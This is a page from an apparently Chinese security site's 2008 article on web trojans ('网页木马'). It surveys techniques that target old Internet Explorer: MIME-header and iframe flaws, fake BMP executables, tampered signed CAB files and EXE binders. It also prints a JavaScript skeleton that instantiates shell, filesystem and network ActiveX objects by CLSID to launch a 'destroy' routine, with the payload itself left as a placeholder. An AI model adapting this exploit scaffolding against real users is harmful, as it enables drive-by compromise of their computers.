通行证│用户名: 密码: 验证码: 验证码,看不清楚?请点击刷新验证码 爱心红客 电信网通铁通移动 在线
文章搜索:
热门搜索:红客 黑鹰 红客技术 安全动画 红客培训
首页 文章 软件 动画 资源 励志 论坛 邮箱 会员 军事 科技 博客 爱心红客 最近更新 800g资源
 业内新闻 漏洞公告 病毒公告 电脑知识 网络知识 菜鸟入门 攻防教程 黑客攻防 安全编程 工具使用 综合安全 个人安全 安全相关 Q Q安全 原创精华 红客人物 站内事件
您现在的位置: 爱国者安全网 >> 文章类 >> 安全防御 >> 安全相关 >> 文章正文
推荐:国内资深黑客详谈网页木马
责任编辑:酷酷の鱼   更新日期:2008-5-9
 

五、目前常用的网页木马制作方式

1.Javascript.Exception.Exploit
利用JS+WSH的完美结合,来制作恶意网页。

2.错误的MIME Multipurpose Internet Mail Extentions,多用途的网际邮件扩充协议头.几乎是现在网页木马流行利用的基本趋势,这个漏洞在IE5.0到IE6.0版本中都有。

3.EXE to .BMP + Javascritp.Exception.Exploit用虚假的BMP文件诱惑用户运行。

4.iframe  漏洞的利用

当微软的IE窗口打开另一个窗口时,如果子窗口是另一个域或安全区的话,安全检查应当阻止父窗口访问子窗口。但事实并非如此,父窗口可以访问子窗口文档的frame,这可能导致父窗口无论是域或安全区都能在子窗口中设置Frame或IFrame的URL。这会带来严重的安全问题,通过设置URL指向javascript协议,父窗口能在子域环境下运行脚本代码,包括任意的恶意代码。攻击者也能在“我的电脑”区域中运行脚本代码。这更会造成严重的后果。 

5.通过安全认证的CAB,COX

此类方法就是在.CAB文件上做手脚,使证书.SPC和密钥.PVK合法

原理:IE读文件时会有文件读不出,就会去“升级”这样它会在网页中指定的位找 .cab 并在系统里写入个CID读入.cab里的文件。

方法:.cab是WINDOWS里的压缩文件, IE里所用的安全文件是用签名的,CAB也不例外,所做的CAB是经过安全使用证书引入的。也就是说IE认证攻击,之所以每次都能入侵,是因为它通过的是IE认证下的安全攻击。

6.EXE文件的捆绑

现在的网页木马捆绑机几乎是开始泛滥了,多的数不胜数。再将生成的MHT文件进行加密。

六、常用网页木马运行原理的分析

  1.Javascript.Exception.Exploit

  常用的攻击代码:

  

      Function destroy(){
  try
  {
  //ActiveX initialization 初始化ActiveX,为修改注册表做准备
  a1=document.applets[0];
  //获取applet运行对象,以下语句指向注册表中有关IE的表项
  a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
  a1.createInstance();
  Shl = a1.GetObject();
  a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
  a1.createInstance();
  FSO = a1.GetObject();
  a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
  a1.createInstance();
  Net = a1.GetObject();
  try
  {
  开始进行破坏
  }
  }
  catch(e)
  {}
  }
  catch(e)
  {}
  }
  function do()
  {
  //初始化函数,并每隔一秒执行修改程序
  setTimeout("destroy()", 1000); //设定运行时间1秒
  }
  Do() //进行破坏的执行函数指令

 

上一页  [1] [2] [3] [4] [5] [6] [7] [8] 下一页

  • 上一篇文章:
  • 下一篇文章: 没有了
  • 最近更新
    固顶文章 企业网络组建与维护班正式开课
    普通文章 瑞星公司05月09日发布 每日计算机病毒及木马播报
    推荐文章 推荐:国内资深黑客详谈网页木马
    普通文章 遇乱不慌 浅谈电脑病毒传染过程
    普通文章 教你巧妙分离带木马病毒文件 留下自己最爱
    普通文章 三措施防止恶意软件 保障网络安全
    普通文章 安全课堂 网络安全发展及其重要性
    普通文章 聚生网管针对ARP病毒的解决方案
    普通文章 用命令行查找ARP病毒母机
    普通文章 263首推"无限容量"邮箱 欲提高市场占有率
    热门文章
    普通文章菜鸟课堂:检查自己电脑是否成了僵尸计算机
    普通文章用汉字保卫网络安全 从底层拒绝黑客攻击
    普通文章以其之道还施彼身 注册表映像劫持巧治病毒
    普通文章Linux系统下防火墙设置方法介绍
    普通文章巴斯基08年4月21日至27日周病毒报告
    普通文章应用软件使用风险报告:员工突破网络监管
    普通文章SQL注入新方法 可利用日期和数字类型
    普通文章Defcon:黑客比赛找杀软漏洞 杀毒厂商痛恨
    普通文章互联网正在爆发大规模JavaScript攻击
    普通文章研究人员发现攻击Oracle数据库新方法
    精彩专题